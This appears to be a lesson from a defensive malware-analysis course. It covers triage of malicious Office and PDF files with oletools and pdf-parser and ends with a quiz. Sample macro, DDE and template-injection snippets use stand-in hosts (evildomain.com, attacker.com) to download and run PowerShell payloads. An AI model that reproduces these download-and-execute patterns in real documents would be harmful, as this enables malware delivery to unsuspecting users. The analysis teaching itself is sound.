What You'll Learn
- Explain why Office documents remain the number one malware delivery vector and how attackers exploit user trust
- Understand the OLE2 Compound Binary Format and how it embeds VBA macro code, embedded objects, and metadata
- Identify common VBA macro triggers (AutoOpen, Document_Open, Workbook_Open) and their execution conditions
- Use the oletools suite (olevba, oleid, rtfobj, mraptor) to extract, analyze, and assess macro risk without opening the document
- Apply macro deobfuscation techniques to decode string concatenation, Chr() encoding, environment variable abuse, and WMI execution paths
- Analyze modern document threats including XLM 4.0 macros, DDE injection, and template injection via remote templates
- Perform basic PDF malware analysis targeting JavaScript payloads, embedded files, and launch actions
- Follow a safer analysis workflow that avoids direct document opening at every stage
Every phishing campaign in your inbox starts the same way: an email with an attachment. That attachment is almost always a document — a Word file, an Excel spreadsheet, a PDF. According to multiple annual threat reports, malicious Office documents account for over 40% of all malware delivery, more than executables, scripts, and archives combined. This lesson teaches you to dissect those documents without ever opening them.
Why Office Documents Dominate Malware Delivery
Three factors make Office documents the perfect weapon:
| Factor | Why It Works |
|---|---|
| Trust | Users open documents every day — invoices, reports, contracts. A .docx feels safe in a way that a .exe never does. |
| Built-in code execution | VBA macros provide a full programming environment embedded inside the document. Microsoft designed this for automation — attackers repurposed it for payload delivery. |
| Evasion | Document files bypass many email gateways and endpoint protections that focus on executable files. Macros execute inside a trusted application (Word, Excel), inheriting its reputation. |
Microsoft's mitigation timeline. Microsoft began blocking macros in files downloaded from the internet by default in 2022 (Mark of the Web + VBA blocking). Attackers adapted with template injection, OneNote containers, ISO files, and other bypass techniques. The core analysis skills in this lesson apply regardless of which bypass technique is currently in vogue.
OLE2 File Format: What Is Inside a .doc File?
The OLE2 Compound Binary Format (also called Compound File Binary Format) is a file system within a file. Think of a .doc file as a miniature FAT filesystem containing multiple "streams" — named data blobs that hold document content, formatting, macros, embedded objects, and metadata.
| Stream | Contents |
|---|---|
WordDocument | The document text and formatting |
Macros/VBA/ThisDocument | VBA macro source code |
Macros/VBA/Module1 | Additional VBA modules |
\x01CompObj | Application identification |
\x05SummaryInformation | Document metadata (author, dates, etc.) |
ObjectPool/ | Embedded OLE objects (other files inside the document) |
Modern .docx/.xlsx/.pptx files use the Open XML format (ZIP archive containing XML files), but VBA macros still use OLE2 containers embedded within the ZIP structure (vbaProject.bin). Malware authors frequently use the legacy .doc/.xls format specifically because the OLE2 binary format is harder to inspect casually.
VBA Macro Triggers
Macros do not execute by themselves. They need a trigger. Attackers use auto-execution hooks that fire when the document is opened:
| Trigger | Application | When It Fires |
|---|---|---|
AutoOpen() | Word | When a .doc document is opened (legacy) |
Document_Open() | Word | When a .docx or .doc document is opened |
Auto_Open() | Excel | When a .xls workbook is opened (legacy) |
Workbook_Open() | Excel | When a .xlsx or .xls workbook is opened |
AutoExec() | Word | When Word starts (template-based) |
AutoClose() | Word | When the document is closed (delayed execution) |
Document_Close() | Word | When the document is closed |
AutoClose and Document_Close are sneaky. Malware that triggers on document close evades sandboxes that only monitor the first few seconds after opening. If your sandbox opens the file, waits 60 seconds, and sees nothing, it marks the file clean. The payload fires when the sandbox closes the document. Always check for close-triggered macros.
The oletools Suite
oletools is a Python toolkit purpose-built for analyzing OLE2 files and VBA macros. It is the standard tool for document malware analysis in most SOC teams.
Installation
# Install oletools (pre-installed on REMnux)
pip install oletools
# Verify installation
olevba --help
oleid --help
oleid: Quick Identification
oleid performs a rapid triage of a document file, reporting whether it contains macros, encrypted content, external relationships, or other risk indicators:
$ oleid suspicious_invoice.doc
Filename: suspicious_invoice.doc
Indicator Value
----------------------------- ---------
File format OLE
Container format OLE
Application name Microsoft Office Word
Encrypted False
VBA Macros Yes
XLM Macros No
External Relationships No
ObjectPool No
Flash objects 0
The key fields: VBA Macros: Yes tells you there is code to extract. External Relationships would indicate template injection. ObjectPool would indicate embedded OLE objects.
olevba: Extract and Deobfuscate VBA
olevba is the workhorse. It extracts VBA macro source code, identifies suspicious keywords, and performs basic deobfuscation:
$ olevba suspicious_invoice.doc
VBA MACRO ThisDocument.cls
in file: suspicious_invoice.doc - OLE stream: 'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub AutoOpen()
Dim cmd As String
cmd = Chr(112) & Chr(111) & Chr(119) & Chr(101) & Chr(114)
cmd = cmd & Chr(115) & Chr(104) & Chr(101) & Chr(108) & Chr(108)
Dim url As String
url = "http://evil" & "domain.com" & "/payload.exe"
Shell cmd & " -c ""IEX(New-Object Net.WebClient).DownloadString('" & url & "')""", vbHide
End Sub
+----------+--------------------+---------------------------------------------+
|Type |Keyword |Description |
+----------+--------------------+---------------------------------------------+
|AutoExec |AutoOpen |Runs when the Word document is opened |
|Suspicious|Shell |May run an executable file or a system command|
|Suspicious|Chr |May obfuscate strings (Chr decoding) |
|Suspicious|vbHide |May run a hidden process |
|IOC |http://evildomain |URL (potentially malicious) |
+----------+--------------------+---------------------------------------------+
rtfobj: RTF Embedded Objects
RTF files can embed OLE objects that execute on open. rtfobj extracts these:
$ rtfobj malicious_resume.rtf
File: malicious_resume.rtf
RTF Embedded Objects:
id: 0
format_id: 2 (Embedded)
class name: 'Package'
data size: 45312
OLE Package:
Filename: update.exe
Source path: C:\Temp\update.exe
Temp path: C:\Temp\update.exe
# Extract the embedded object for further analysis
$ rtfobj -s all malicious_resume.rtf
Saved object to: malicious_resume.rtf_object_0.bin
mraptor: Macro Risk Assessment
mraptor performs a quick risk assessment — does the document auto-execute macros, write files, or execute commands?
$ mraptor suspicious_invoice.doc
FILE: suspicious_invoice.doc
Result: SUSPICIOUS
Flags: AutoExec, Write, Execute
- Auto-execution trigger: AutoOpen
- File write capability: Shell command
- Code execution: Shell function call
The three flags to watch: AutoExec (runs without user action beyond opening), Write (creates/modifies files), Execute (runs commands or processes).
Macro Deobfuscation Techniques
Attackers obfuscate macro code to bypass static analysis and AV signatures. Here are the most common techniques and how to decode them:
String Concatenation
' Obfuscated
Dim s As String
s = "pow" & "ersh" & "ell" & ".e" & "xe"
' Deobfuscated: powershell.exe
Chr() Encoding
' Obfuscated
s = Chr(112) & Chr(111) & Chr(119) & Chr(101) & Chr(114) & Chr(115) & Chr(104) & Chr(101) & Chr(108) & Chr(108)
' Deobfuscated: powershell
' Decode manually: 112=p, 111=o, 119=w, 101=e, 114=r, 115=s, 104=h, 101=e, 108=l, 108=l
# Quick Python decoder for Chr() chains
import re
code = 'Chr(112) & Chr(111) & Chr(119) & Chr(101) & Chr(114) & Chr(115) & Chr(104) & Chr(101) & Chr(108) & Chr(108)'
result = ''.join(chr(int(x)) for x in re.findall(r'Chr\((\d+)\)', code))
print(result) # powershell
Environment Variable Abuse
' Obfuscated — uses environment variables to avoid string detection
Dim path As String
path = Environ("COMSPEC") ' Resolves to C:\Windows\system32\cmd.exe
' Or building paths dynamically
path = Environ("APPDATA") & "\\update.exe"
WMI Execution
' Obfuscated — uses WMI to execute commands instead of Shell()
Dim objWMI As Object
Set objWMI = GetObject("winmgmts:\\\\.\\root\\cimv2:Win32_Process")
objWMI.Create "powershell.exe -enc JABjAGwA..."
' This avoids triggering rules that look for Shell() or CreateObject("WScript.Shell")
olevba handles most deobfuscation automatically. Run olevba --deobf to get decoded strings, resolved Chr() sequences, and concatenated values. For heavily obfuscated macros, combine olevba output with manual Python scripting and ViperMonkey (a VBA emulator that executes macros in a sandbox).
Modern Document Threats
VBA macros are the classic attack, but modern threats have expanded beyond them:
XLM 4.0 Macros (Excel)
XLM macros predate VBA and are stored in hidden Excel sheets rather than VBA modules. Many security tools miss them because they do not look like traditional macros:
# XLM macros live in hidden sheets, not VBA streams
# Use olevba with --xlm flag or XLMDeobfuscator
$ olevba --xlm suspicious_spreadsheet.xls
# Or use the dedicated tool
$ xlmdeobfuscator -f suspicious_spreadsheet.xls
| XLM Feature | Why It Is Dangerous |
|---|---|
| Stored in hidden sheets | Not visible in VBA editor; analysts miss them |
| No VBA stream | Tools scanning for VBA macros report "no macros found" |
| EXEC() and CALL() functions | Can execute arbitrary commands and DLL functions |
| Formula-based | Logic expressed as cell formulas, harder to read than VBA |
DDE Injection (Dynamic Data Exchange)
DDE allows Office documents to pull data from other applications. Attackers abuse this to execute commands without any macros:
# DDE field in a Word document
{ DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -c IEX(...)" }
# The document has NO macros — oleid reports VBA Macros: No
# But opening it prompts "This document contains links to other data sources"
DDE attacks have no macros to scan. Traditional macro analysis tools report the document as clean. Look for DDE fields in document XML (word/document.xml in .docx files) or use olevba which also detects DDE patterns. Users see a prompt about "updating links" — not a macro warning — making the social engineering more effective.
Template Injection
Template injection loads a remote template containing malicious macros. The document itself has no macros — it just references a URL:
<!-- Inside the .docx ZIP: word/_rels/settings.xml.rels -->
<Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
Target="https://attacker.com/template.dotm" TargetMode="External"/>
The attack flow:
- User opens a clean-looking
.docx(no macros, passes AV) - Word fetches the remote template from the attacker's server
- The template contains VBA macros that execute
Detection: check for External Relationships in oleid output, or manually inspect the _rels/ directory inside the docx ZIP file.
PDF Malware Analysis
PDFs can contain JavaScript, embedded files, and launch actions. While less common than Office malware, PDF-based attacks target organizations that have blocked Office macros.
Key PDF Analysis Tools
| Tool | Purpose |
|---|---|
pdf-parser | Parse PDF structure, extract streams and objects |
pdfid | Quick triage — counts JavaScript, embedded files, launch actions |
peepdf | Interactive PDF analysis framework |
Quick PDF Triage with pdfid
$ pdfid suspicious_report.pdf
PDFiD 0.2.8 suspicious_report.pdf
PDF Header: %PDF-1.7
obj 12
endobj 12
stream 4
endstream 4
/Page 1
/JS 2 <-- JavaScript present!
/JavaScript 2 <-- JavaScript present!
/OpenAction 1 <-- Runs on document open!
/EmbeddedFile 1 <-- Contains embedded file!
/Launch 0
/AcroForm 0
Red flags: /JS or /JavaScript (embedded code), /OpenAction (auto-execute on open), /EmbeddedFile (file inside the PDF), /Launch (execute external application), /AA (additional actions).
Extracting PDF JavaScript
# Use pdf-parser to extract JavaScript streams
$ pdf-parser --search javascript suspicious_report.pdf
obj 8 0
Type: /Action
Contains stream
/S /JavaScript
/JS (stream content)
# Extract the stream
$ pdf-parser --object 8 --filter --raw suspicious_report.pdf > extracted_js.txt
Safer Analysis Workflow
The golden rule of document malware analysis: never open the document in its native application until you have exhausted every static analysis technique.
| Step | Action | Tool |
|---|---|---|
| 1 | Hash and check reputation | sha256sum → VirusTotal lookup |
| 2 | Quick triage | oleid (Office) or pdfid (PDF) — identify risk indicators |
| 3 | Extract macros | olevba --deobf (Office) or pdf-parser (PDF) |
| 4 | Assess risk | mraptor — AutoExec + Write + Execute flags |
| 5 | Extract embedded objects | rtfobj (RTF) or pdf-parser (PDF) |
| 6 | Deobfuscate manually | Python scripting for remaining encoded strings |
| 7 | Dynamic analysis (if needed) | Open in sandboxed VM with network monitoring (Lesson 11.3-11.4 techniques) |
Never open suspicious documents on your analysis workstation. Even with macros disabled, documents can exploit parser vulnerabilities in Office or PDF readers. Always use a dedicated analysis VM. If you must view the document content visually, use LibreOffice in a Linux VM (different parser, different vulnerability surface) or convert to PDF/image first.
Key Takeaways
- Office documents are the #1 malware delivery vector because users trust them, they contain built-in code execution (VBA), and they bypass many security controls designed for executables
- The OLE2 format is a file system within a file — macros, embedded objects, and metadata live in named streams that oletools can extract and inspect
- Auto-execution triggers (AutoOpen, Document_Open, Workbook_Open) fire when documents are opened; close triggers (AutoClose, Document_Close) evade sandboxes that only monitor opening
- oletools is the standard SOC toolkit: oleid for triage, olevba for extraction and deobfuscation, rtfobj for RTF objects, mraptor for risk assessment
- Common deobfuscation patterns: string concatenation, Chr() encoding, environment variable resolution, and WMI-based execution to avoid Shell() detection
- Modern threats extend beyond VBA: XLM 4.0 macros hide in spreadsheet cells, DDE injection has no macros at all, and template injection fetches remote payloads
- PDF analysis uses pdfid for triage and pdf-parser for stream extraction — watch for /JS, /OpenAction, /EmbeddedFile, and /Launch indicators
- The safer analysis workflow exhausts static techniques before dynamic analysis: hash → triage → extract → deobfuscate → sandbox (only if needed)
What's Next
You can now dissect the most common malware delivery vector without ever opening the document. In Lesson 11.6, we bring everything together — you will learn to read sandbox reports from platforms like Any.Run, Hybrid Analysis, and VirusTotal, extract IOCs from automated analysis, and build a complete malware analysis report that connects static findings, dynamic behavior, and detection recommendations into a single deliverable.
Knowledge Check: Office Document & Macro Analysis
10 questions · 70% to pass
Why are Office documents the most common malware delivery vector, ahead of executables?
In the OLE2 Compound Binary Format, where is VBA macro source code stored?
Why should analysts check for AutoClose and Document_Close macro triggers in addition to AutoOpen?
In Lab 11.5, you use oletools to analyze a malicious document. Which tool extracts VBA macro source code and performs basic deobfuscation?
A macro contains: Chr(112) & Chr(111) & Chr(119) & Chr(101) & Chr(114) & Chr(115) & Chr(104) & Chr(101) & Chr(108) & Chr(108). What does this decode to?
What makes DDE (Dynamic Data Exchange) injection particularly dangerous compared to VBA macros?
In Lab 11.5, you encounter a .docx file that oleid reports has no VBA macros but has 'External Relationships: Yes'. What attack technique does this suggest?
When using mraptor for macro risk assessment, which combination of flags indicates the highest risk?
When performing quick PDF triage with pdfid, which indicators suggest the PDF contains an exploit or payload?
In the safer analysis workflow, why should you exhaust static analysis techniques before opening a document in a sandbox?
0/10 answered